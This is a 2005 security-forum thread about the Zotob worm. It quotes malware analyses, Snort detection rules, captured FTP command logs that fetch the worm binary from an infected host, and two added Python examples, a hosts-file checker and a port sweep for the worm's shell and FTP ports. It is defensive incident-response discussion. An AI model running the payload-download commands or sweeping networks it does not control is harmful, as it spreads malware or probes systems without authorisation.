stay
Aug 14 2005, 08:31 PM
Update: see also
http://www.microsoft.com/security/encyclop...m:Win32/Zotob.A (info on how the worm works)
http://www.microsoft.com/security/incident/zotob.mspx
http://www.microsoft.com/technet/security/...ory/899588.mspx (updated security advisory)
http://www.heise.de/newsticker/meldung/62802 (German)
http://www.f-secure.com/v-descs/zotob_a.shtml
QUOTE
Summary
Zotob.A is a Mytob clone that spreads using a vulnerability in Windows Plug and Play service (MS05-039).
Detailed Description
The worm is a packed PE executable file 22528 bytes long.
Installation to system
When run, the worm copies under %SYSTEM% directory using the name 'botzor.exe' and creates a named mutex 'B-O-T-Z-O-R'.
It then alters registry entries to ensure that it is started when a user logs on or the system is restarted:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"WINDOWS SYSTEM" = "botzor.exe"
Spreading using Plug and Play service vulnerability
The worm scans for systems vulnerable to Microsoft Windows Plug and Play service (MS05-039) through TCP/445. If the attack is successful a shell (cmd.exe) is started on port 8888. Through the shell port, the worm instructs the remote computer to download and execute the worm from the attacker computer using FTP. The FTP server listens on port 33333 on all infected computers with the purpose of serving out the worm for other hosts that are being infected. The downloaded file is saved as 'haha.exe' on disk.
Bot functionality
The worm tries to connect to IRC channel at predefined address. The attacker who knows channel password can instruct the bot to execute the following actions:
- Request worm uptime
- Request worm version
- Shutdown worm
- Download and execute files
- Delete files
- Update worm
Other details
Zotob.A also contains the following message to AV vendors:
MSG to avs: the first av who detect this worm will be the first killed in the next 24hours!!!
however f-secure and others don't care much about it
QUOTE
waiting for the dos to one of them, or maybe just a modded worm killing the specified av? hmm, have a closer look: "will be the first", therefore meaning the author wants to attack all avs!? however i think you can see this from two sides: on the one hand people now hopefully will patch their systems, on the other hand, if your pc is used as a drone this also isn't a nice thing and makes clear it's not the author's intention to make you aware of the bad security of your system, like the sasser author intended to do (at least he claimed so)... what i'm wondering about: shouldn't it be easy to catch the author as he's the only or at least one of few (users could probably get the channel pass through reverse engineering or by close contact to the author, which should also make it possible to catch him) knowing the irc chan pass and joining it?
pita
Aug 14 2005, 08:38 PM
more info from http://isc.sans.org/diary.php?date=2005-08-14
CODE
MS05-039 Worm in the wild
-039 is NOT Microsoft's lucky number
One of our readers, John Smith, submitted this:
"Interesting game of numbers:
SQL Slammer was using bug fixed in MS02-039
Zotob is using bug fixed in MS05-039
Hex 39 is 57 decimal, which is big W (Worm? Windows?) in ASCII."
The technical details:
Starting around 11:30 UTC, we've received several reports on a new worm variant that makes use of MS05-039 to spread. If you're not patched yet, this is your last call.
F-Secure named the critter "Zotob.A",http://www.f-secure.com/weblog/
We've also received a submission of a binary called "pnpsrv.exe", which is recognized by ClamAV as Trojan.Spybot-123. Another reader has contributed evidence that a successful exploit by Zotob.A (or variant)
The worm will download the main payload from the infecting machine. Once a machine is infected, it will become an ftp server itself. It will scan for open port 445/tcp. Once it finds a system with port 445 listening, it will try to use the PnP exploit to download and execute the main payload via ftp.
Important facts so far:
- Patch MS05-039 will protect you
- Windows XP SP2 and Windows 2003 can not be exploited by this worm, as the worm does not use a valid logon.
- Blocking port 445 will protect you (but watch for internal infected systems)
- The FTP server does not run on port 21. It appears to pick a random high port.
Quick FTP log:
open aaa.bbb.ccc.ddd 31656
user 1 1
get winpnp.exe
quit
(IP address obfuscated).
We'll keep adding to this diary as new information becomes available.
Thanks so far to Johnathan Norman from Alert Logic for a lot of the details. Other good information can be found at the F-Secure weblog at http://www.f-secure.com/weblog/ Also see the Microsoft MS05-039 bulletin from last week: http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Please submit any new code captures via our contact page: http://isc.sans.org/contact.php If possible, do not pack/encrypt the uploads, maybe provide an md5 sum to preserve the code in its original beauty.
Shown below are Snort rules, submitted by the members of the Alert Logic Security Research Team:
- Jeremy Hewlett, Technical Director of Security Research
- Johnathan Norman, Sr. Security Analyst
- Chris Baker, Technical Director of Security Operations
alert tcp any any -> any 445 (msg:"EXPLOIT SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000130; rev:1;)
alert tcp any any -> any 139 (msg:"EXPLOIT NETBIOS SMB Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000131; rev:1;)
alert tcp any any -> any 445 (msg:"EXPLOIT NETBIOS SMB-DS Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000132; rev:1;)
ssj4conejo
Aug 14 2005, 10:31 PM
There go the worm writers again ruining everyone's fun. Selfish bastards.
apoc_neo
Aug 15 2005, 08:11 AM
My friend found this, I will not disclose his nick.
CODE
open 69.15.252.162 33333
user hell rulez
binary
get haha.exe
quit
Look at what he found here
Gurou
Aug 15 2005, 12:33 PM
can you please upload the binary ?
Necrocide
Aug 15 2005, 01:23 PM
I knew it would come sooner or later, sad. Crap.
DarkRider
Aug 15 2005, 03:33 PM
They are saying that houseofdabus is spreading the worm
stay
Aug 15 2005, 07:12 PM
QUOTE(DarkRider @ Aug 15 2005, 02:33 PM) They are saying that houseofdabus is spreading the worm
where did you read this? source? i only read that his exploit was used, not that he is the author of the worm (i'd also say that's under his level...)! maybe you understood something wrong?
Prophet
Aug 15 2005, 07:48 PM
The creator of this bot is Diablo, he isn't going to do anything to the A/V, I know him.
Killaloop
Aug 16 2005, 06:48 AM
QUOTE(Prophet @ Aug 15 2005, 07:48 PM) The creator of this bot is Diablo, he isn't going to do anything to the A/V, I know him.
telling that you know a worm author on a public board is not a very clever thing, especially because Microsoft is most likely after him. good luck
aelphaeis_mangarae
Aug 16 2005, 11:50 AM
Diablo is an idiot.
1. He tells people he writes the virus.
2. In the 3rd variant (.c) he tries to add an email spreader, and fails (what a loser). The worm itself is basically a rip from a new version of Hellbot.
3. The worm itself connects to a Turkish IRC channel.
Diablo is asking to be busted, I am not sure what Turkey's laws are on this kind of stuff, they seem to get away with a lot... but I don't know about this. Thanks for the info on Diablo, Prophet (if your information is correct).
QUOTE They are saying that houseofdabus is spreading the worm
A good example of how the media can screw things up... well not the media but IT security writers and the like. houseofdabus just wrote a universal exploit for the vulnerability, that is all. The universal exploit was used in a version of Hellbot, which the guy ripped off and turned into a worm.
Yorn
Aug 16 2005, 04:26 PM
House of dabus's website is down now. I hope it's not because they really suspect him of spreading the worm. He's the same guy that wrote the exploit code for LSASS over a year ago, but everyone knew it was someone else that was actually doing it. I think certain people in the media need to get their facts straight.
I don't know who the guest is that came in to talk about this Diablo individual, but the worm clearly is changing the hosts file which disables the upgradability of most AV software. I would tend to think that poster is fake and doesn't really know the author of the worm.
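Yorn's point about the hosts file is something you can check on each machine without touching the network, and it works even where the worm's other indicators have been renamed. The following is an added example written for this thread, not code from the posts or from any AV vendor: it parses a hosts file and flags names that are pinned to loopback or 0.0.0.0, and names that fall under a watchlist of vendor/update domains. The watchlist, the sample file and the hostnames in it are constructed for the example; the thread does not list which entries Zotob actually writes, so swap in the update hosts your own AV and patch tooling rely on.

```python
"""Flag hosts-file entries that would sinkhole AV or OS update traffic.

Added example for this thread, not code from the posts or from any vendor.
WATCHLIST and SAMPLE_HOSTS are constructed for illustration.
"""
import ipaddress

# Names a hosts file legitimately maps to loopback; never reported.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}

# Assumed watchlist: domains whose override would break AV/OS updates.
# Replace with the update hosts your own tooling actually contacts.
WATCHLIST = ("symantec.com", "f-secure.com", "mcafee.com", "sophos.com",
             "kaspersky.com", "trendmicro.com", "windowsupdate.com", "microsoft.com")


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; comments and junk lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                              # first token is not an address
        for name in parts[1:]:                    # one line may carry many names
            yield addr, name.lower().rstrip(".")


def on_watchlist(name):
    """True for a watchlisted domain or any subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in WATCHLIST)


def suspicious_entries(text):
    """Return [(ip, name, [reasons])] for every entry worth a second look."""
    findings = []
    for addr, name in parse_hosts(text):
        if name in LOCAL_NAMES:
            continue
        reasons = []
        if addr.is_loopback or addr.is_unspecified:
            reasons.append("pinned to %s" % addr)
        if on_watchlist(name):
            reasons.append("vendor/update host overridden in hosts file")
        if reasons:
            findings.append((str(addr), name, reasons))
    return findings


# Constructed sample, not a capture from an infected machine.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.1.2.3        intranet.example.local       # legitimate internal override
127.0.0.1       www.symantec.com             # update host sinkholed
0.0.0.0         update.f-secure.com
127.0.0.1       devbox.example.local         # loopback pin, not a vendor
garbage line without an address
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for ip, name, reasons in suspicious_entries(text):
        print(f"{ip:15} {name:30} {'; '.join(reasons)}")
```

Run it with the path to a machine's hosts file (on Windows 2000/XP that is %SystemRoot%\system32\drivers\etc\hosts) or with no argument to see the sample flagged. A loopback pin on a non-vendor name, as with devbox.example.local above, is reported too because a fleet-wide sweep wants the full list; triage it, do not treat it as proof of infection.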
sp00fy
Aug 17 2005, 07:59 AM
hi!
in my company, we guess that a lot of PCs are infected with Zotob, is there any remote vuln mass scanner out? that would be really useful for us (my boss is just swearing and stressing all the time) - so can someone give me a link to a scanner? (we won't try to exploit each PC)
cheers
sp00fy
strych_nine
Aug 17 2005, 08:22 AM
QUOTE(sp00fy @ Aug 17 2005, 08:59 AM) hi! in my company, we guess that a lot of PCs are infected with Zotob, is there any remote vuln mass scanner out? that would be really useful for us (my boss is just swearing and stressing all the time) - so can someone give me a link to a scanner? (we won't try to exploit each PC) cheers sp00fy
ever heard of av-tools? or netstat, fport, openports? skiddie...
sp00fy
Aug 17 2005, 09:17 AM
@strych_nine: no... you don't get the sense of my question! - Or do you want to run a netstat cmd on a network with over 5000 PCs (without servers)? Yes of course we have got McAfee with an agent on each system... but they restart a lot -.- And we have to secure them all... so don't tell me I'm a kiddie, because I don't know how to solve this problem -.- -> I need a "mass" scanner like the Foundstone Sasser scanner! ps I guess you don't really work in a great worldwide company?
b4nqu0
Aug 17 2005, 01:22 PM
QUOTE(sp00fy @ Aug 17 2005, 02:59 AM) hi! in my company, we guess that a lot of PCs are infected with Zotob, is there any remote vuln mass scanner out? that would be really useful for us (my boss is just swearing and stressing all the time) - so can someone give me a link to a scanner? (we won't try to exploit each PC) cheers sp00fy
Nessus has a plugin for this but you need to register to get it. I've heard people say they've used it on their Class B networks so you should be all set. I've also heard eEye has something but it can only do 16 hosts.
strych_nine
Aug 17 2005, 02:00 PM
QUOTE(sp00fy @ Aug 17 2005, 10:17 AM) @strych_nine: no... you don't get the sense of my question! - Or do you want to run a netstat cmd on a network with over 5000 PCs (without servers)? Yes of course we have got McAfee with an agent on each system... but they restart a lot -.- And we have to secure them all... so don't tell me I'm a kiddie, because I don't know how to solve this problem -.- -> I need a "mass" scanner like the Foundstone Sasser scanner! ps I guess you don't really work in a great worldwide company?
ok sry, i apologize. i just thought that such a large company has a huge network and an admin who can control things like connections, ports etc. i think mass-scanning (which most bots do) or outbound connections using an unusual port to an unusual host would attract attention...
sp00fy
Aug 17 2005, 03:30 PM
@b4nqu0: hi thx for your reply! good idea to remember Nessus (why did I forget this one!?) - yes it seems that you have to register to get this plugin... oh that seems to take a lot of time -.- @strych_nine: did you ever see a network monitor of a company like this one? - ok we can filter... but that's laborious, ps of course a few of us started with filtering the internet links  greez sp00fy
click
Aug 17 2005, 03:45 PM
QUOTE(sp00fy @ Aug 17 2005, 03:30 PM) @b4nqu0: hi thx for your reply! good idea to remember Nessus (why did I forget this one!?) - yes it seems that you have to register to get this plugin... oh that seems to take a lot of time -.- @strych_nine: did you ever see a network monitor of a company like this one? - ok we can filter... but that's laborious, ps of course a few of us started with filtering the internet links  greez sp00fy
Or, you could use nmap and scan for port 8888.... From the Nessus website:
QUOTE
A Microsoft Windows shell is running on port 8888. This may indicate an infection by the Zotob worm, although other worms may also create a shell on this port. The remote host has been compromised.
Solution : Reinstall the remote host
See also : http://securityresponse.symantec.com/avcen...32.zotob.a.html
Risk factor : High
Written by: This script is Copyright © 2005 Tenable Network Security
p.s.: you, being a network admin, in a company of 5000 computers, might consider creating an emergency patch roll-out plan.... I work in a company (not as a network admin) of over 100,000 computers across North America -- the issue was resolved within a 1 hr timeframe, with fewer than 100 computers requiring minor attention. Just a comparison...
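The F-Secure description quoted in stay's first post says an infected host keeps a cmd.exe bound to 8888/tcp and an FTP server on 33333/tcp, and click's answer above is to sweep the network for 8888. The following is that sweep as an added example, written for this thread rather than taken from the posts, nmap or the Nessus plugin: it connect-scans both ports across a range in parallel and, where a port answers, reads whatever the service sends first so a cmd.exe banner can be told apart from some unrelated service on 8888. The banner strings it looks for are an assumption about how a socket-bound cmd.exe greets a client, and the listeners in demo() are constructed stand-ins so the code can be exercised offline. As the Nessus text itself says, other worms also bind shells to 8888, so a hit means "go look", not "confirmed Zotob".

```python
"""Sweep a range for the Zotob shell port (8888/tcp) and FTP port (33333/tcp).

Added example for this thread; not code from the posts, nmap or Nessus.
CMD_MARKERS is an assumption about cmd.exe's greeting; demo() uses
constructed local listeners instead of real infected hosts.
"""
import ipaddress
import socket
import sys
import threading
from concurrent.futures import ThreadPoolExecutor

SHELL_PORT = 8888    # bound cmd.exe, per the F-Secure description quoted above
FTP_PORT = 33333     # the worm's FTP server that hands out haha.exe
# Assumption: a cmd.exe with its stdio tied to the socket prints its usual
# version banner followed by a drive-letter prompt such as C:\WINNT\system32>
CMD_MARKERS = (b"Microsoft Windows", b"Microsoft Corp", b":\\")


def probe(host, port, timeout=1.0):
    """Connect to host:port and return ('closed'|'open'|'shell', first_bytes)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(512)          # whatever the service says first
            except socket.timeout:
                banner = b""                  # accepted but silent
    except OSError:
        return "closed", b""                  # refused, unreachable or timed out
    state = "shell" if any(m in banner for m in CMD_MARKERS) else "open"
    return state, banner


def sweep(targets, workers=64, timeout=1.0):
    """Probe (host, port) pairs concurrently; return {target: (state, banner)}
    for every target that accepted the connection."""
    targets = list(targets)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda t: probe(t[0], t[1], timeout), targets))
    return {t: r for t, r in zip(targets, results) if r[0] != "closed"}


def targets_for(cidr, ports=(SHELL_PORT, FTP_PORT)):
    """Expand a CIDR into (host, port) pairs, skipping network and broadcast."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [(str(h), p) for h in net.hosts() for p in ports]


def start_fake_host(banner, host="127.0.0.1"):
    """Constructed stand-in for an infected machine: accepts connections and
    sends `banner` (possibly nothing). Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                if banner:
                    conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Sweep three local stand-ins (bound cmd.exe, silent service, closed port)
    and return the state found for each, keyed by label."""
    shell = start_fake_host(b"Microsoft Windows 2000 [Version 5.00.2195]\r\n"
                            b"(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\n"
                            b"C:\\WINNT\\system32>")
    silent = start_fake_host(b"")
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed = tmp.getsockname()[1]             # a port nobody listens on
    tmp.close()
    hits = sweep([("127.0.0.1", p) for p in (shell, silent, closed)], timeout=0.5)
    state = lambda p: hits.get(("127.0.0.1", p), ("closed", b""))[0]
    return {"shell": state(shell), "silent": state(silent), "closed": state(closed)}


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(demo())
    else:
        for (host, port), (state, banner) in sorted(sweep(targets_for(sys.argv[1])).items()):
            print(f"{host}:{port}  {state}  {banner[:40]!r}")
```

Usage: `python zotob_sweep.py 10.20.0.0/16` prints every host that accepts on 8888 or 33333, tagging 8888 hits as "shell" when the cmd.exe banner is seen. With 64 workers and a one-second timeout a /16 takes a few minutes; raise the worker count on a fast LAN. Keep in mind the SANS note above: the worm's own FTP port varies between variants (31656 in one capture, 33333 in another), so adjust FTP_PORT to what your captures show, and treat the 8888 shell as the more stable indicator.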
sp00fy
Aug 17 2005, 07:00 PM
thx for your tip (shell port 8888)
yes you've got it right... I'm a network admin in education, so I'm in the IT team, but I have nothing to say :S ... I always made suggestions for other solutions for our network topology, technique, FW, IDS etc... it's horrible; e.g. we won't block connections to the outside, so np for every backdoor, connect-back shellcode etc... but as I said... I have nothing to say to them... anyway: thank you! are these PCs and servers in one big network with one highly secured gateway to the internet, or are they spread out? (it seems like spread out, as you said "across North America")
cheers
sp00fy
click
Aug 17 2005, 07:42 PM
Yeah, the computers are setup on numerous different servers and domains, and although all running on the same ISP and domain, connect to different backbones depending on the location.
But, I am glad to have helped a fellow "student" of security.
as0l0
Aug 18 2005, 01:51 AM
QUOTE(click @ Aug 17 2005, 11:45 PM) p.s.: you, being a network admin, in a company of 5000 computers, might consider creating an emergency patch roll-out plan.... I work in a company (not as a network admin) of over 100,000 computers across North America -- the issue was resolved within a 1 hr timeframe, with fewer than 100 computers requiring minor attention. Just a comparison...
Can you tell us how you patched 100,000 machines within 1 hour? Can you also tell us how you confirmed that patching?
sp00fy
Aug 18 2005, 05:36 AM
QUOTE Can you tell us how you patched 100,000 machines within 1 hour? Can you also tell us how you confirmed that patching?
--> you just need to close the ports... so you can patch - saved from Zotob...
as0l0
Aug 18 2005, 06:46 AM
QUOTE(sp00fy @ Aug 18 2005, 01:36 PM) QUOTE Can you tell us how you patched 100,000 machines within 1 hour? Can you also tell us how you confirmed that patching? --> you just need to close the ports... so you can patch - saved from Zotob...
You close the ports on 100,000 machines? Or just at the perimeter?
tuttefrut
Aug 18 2005, 08:41 AM
QUOTE You close the ports on 100,000 machines? Or just at the perimeter?
if you do it at the perimeter it can still spread itself in the network, no?
sp00fy
Aug 18 2005, 10:12 AM
May depend on the programmer's code... it will connect to a Turkish ircd... and that will fail... so what then happens is unknown to me... anyway it's better to close the perimeter (on these ports) and then kill them in the intranet, without any new incoming Zotobs...